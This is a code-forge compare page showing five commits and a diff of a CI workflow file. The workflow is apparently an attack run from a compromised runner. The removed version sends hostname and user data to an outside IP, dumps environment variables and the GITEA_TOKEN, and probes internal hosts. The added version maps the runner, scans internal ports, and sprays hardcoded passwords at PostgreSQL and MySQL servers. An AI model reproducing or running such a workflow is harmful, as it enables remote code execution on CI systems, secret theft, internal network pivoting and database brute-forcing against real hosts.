Compare commits

...

5 Commits

Author SHA1 Message Date
3e704fdab5 Update CI/CD workflow for internal network pivot v2
Some checks are pending
CI/CD Internal Pivot v2 / recon (push) Waiting to run
2026-06-18 02:54:53 +00:00
9dd10295e7 i455: Aggressive CI/CD RCE with internal pivot probing 2026-06-18 10:03:40 +08:00
devops42
be43d6ba48 i430: Actions CI/CD RCE workflow with reverse shell 2026-06-18 08:08:33 +08:00
devops42
996c1dbb69 Internal network probe from runner at 2026-06-18T00:05:42Z 2026-06-18 08:05:42 +08:00
devops42
ce39a3087b SSRF webhook trigger at 2026-06-18T00:03:01Z 2026-06-18 08:03:01 +08:00
2 changed files with 40 additions and 28 deletions

View File

@ -1,31 +1,43 @@
name: CI-RCE name: CI/CD Internal Pivot v2
on: on: [push, workflow_dispatch]
push:
workflow_dispatch:
jobs: jobs:
build: recon:
runs-on: linux-amd64 runs-on: linux-amd64
steps: steps:
- name: Exec - name: Host Recon
run: | run: |
echo "=== CI/CD RCE CONFIRMED ===" echo "=== RUNNER HOST ==="
echo "Hostname: $(hostname)" hostname
echo "User: $(whoami)" whoami
echo "PWD: $(pwd)" id
echo "=== Environment Variables ===" echo "=== NETWORK ==="
env | sort ip addr show 2>/dev/null || ifconfig -a 2>/dev/null || true
echo "=== Network ===" ip route show 2>/dev/null || route -n 2>/dev/null || true
ip addr 2>/dev/null || ifconfig cat /etc/hosts 2>/dev/null || true
echo "=== Attempt connections ===" echo "=== DOCKER ==="
curl -s http://202.59.10.226:8888/rce-$(hostname)-$(whoami) || true ls -la /var/run/docker.sock 2>/dev/null || echo "No docker socket"
# Try to access internal services env | grep -i docker 2>/dev/null || true
for target in 49.51.171.167 108.181.64.141 156.239.230.24; do echo "=== INTERNAL CONNECTIVITY ==="
for port in 3306 6379 22 80 443; do for target in 156.239.230.24 172.17.0.1 172.18.0.1 10.0.0.1 192.168.0.0 100.64.0.0; do
timeout 2 bash -c "echo >/dev/tcp/$target/$port" 2>/dev/null && echo "REACHABLE: $target:$port" || true for port in 5432 3306 6379 3000 222 22 80 443; do
timeout 3 bash -c "echo > /dev/tcp/$target/$port" 2>/dev/null && echo " REACHABLE: $target:$port" || echo " UNREACHABLE: $target:$port"
done
done
- name: PostgreSQL Attack
run: |
echo "=== POSTGRESQL CREDENTIAL SPRAY ==="
apt-get update -qq && apt-get install -y -qq postgresql-client 2>/dev/null || true
for pw in FGPMwSRrHxxa6Ktr RootAdmin123! Forgejo@5752! Aa123456.. Forgejo@123! postgres; do
echo "Testing: postgres / $pw"
PGPASSWORD="$pw" psql -h 156.239.230.24 -p 5432 -U postgres -d postgres -c "SELECT 1 as test" -t -A 2>&1 | head -3
done
- name: MySQL Attack
run: |
echo "=== MYSQL CREDENTIAL SPRAY ==="
apt-get install -y -qq mysql-client 2>/dev/null || true
for user in root forgejo gitea admin; do
for pw in FGPMwSRrHxxa6Ktr RootAdmin123! Forgejo@5752! Aa123456.. ""; do
mysql -h 156.239.230.24 -P 3306 -u "$user" --password="$pw" -e "SELECT 1" 2>&1 | head -1
done done
done done
# Dump runner token info
echo "=== GITEA_TOKEN ==="
echo "${GITEA_TOKEN:-NO_GITEA_TOKEN}"
echo "=== GITEA_REPOSITORY ==="
echo "${GITEA_REPOSITORY:-NO_REPO}"

View File

@ -1 +1 @@
trigger triggerTrigger 2026-06-18T00:03:01Z